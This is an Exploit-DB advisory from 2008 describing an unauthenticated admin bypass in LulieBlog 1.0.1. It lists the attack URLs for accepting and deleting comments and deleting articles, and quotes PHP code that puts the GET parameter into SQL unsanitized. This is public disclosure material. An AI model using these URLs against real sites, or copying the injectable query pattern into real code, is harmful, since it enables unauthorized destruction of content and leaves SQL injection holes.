LulieBlog 1.0.1 - Remote Authentication Bypass

EDB-ID:

4912

CVE:

2008-0329

EDB Verified:

Author:

ka0x

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-01-15

Vulnerable App:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
LulieBlog 1.0.1 (delete id) Remote Admin Bypass Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

bug found by ka0x
contact: <ka0x01[at]gmail.com>
D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
#from spain

download: http://www.comscripts.com/scripts/php.lulieblog.2138.html

Description:
- The bug will allow us to acept sent comments in the articles,
erase comments and delete articles


accept comments:
http://[host]/Admin/comment_accepter.php?id=[id_comment]

------------------
$id=$_GET["id"];
$sql="UPDATE ".PREFIX_TABLES."commentaire  SET actif = 1 WHERE idcom  = '$id'";
------------------


delete comments:
http://[host]/Admin/comment_refuser.php?id=[id_comment]

------------------
$id=$_GET["id"];
$sql="DELETE FROM ".PREFIX_TABLES."commentaire WHERE idcom  = '$id'";
------------------


delete article:
http://[host]/Admin/article_suppr.php?id=[id_article]

------------------
$id=$_GET["id"];
$sql="DELETE FROM ".PREFIX_TABLES."article WHERE numart='$id'";
------------------


example:
---------
http://localhost/lulieblog/Admin/article_suppr.php?id=4
Delete the article with id=4

# milw0rm.com [2008-01-15]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services